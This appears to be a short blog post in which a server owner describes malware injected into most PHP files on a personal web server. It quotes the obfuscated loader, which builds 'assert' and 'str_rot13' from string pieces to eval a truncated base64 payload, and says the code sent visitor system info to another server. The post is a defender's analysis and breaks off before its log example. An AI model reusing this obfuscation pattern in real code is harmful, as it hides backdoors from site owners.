Battle against injected PHP

Sun, 13 Nov 2016 14:18:51 +0000

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); …etc

$strings = “as”; $strings .= “se”; $strings .= “rt”; $strings2 = “st”; $strings2 .= “r_r”; $strings2 .= “ot13”; $gbz = “riny(”.$strings2(“base64_decode”); $light = $strings2($gbz.’(“nJLtX….”));’); $strings($light); //###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

Grep on

Battle against injected PHP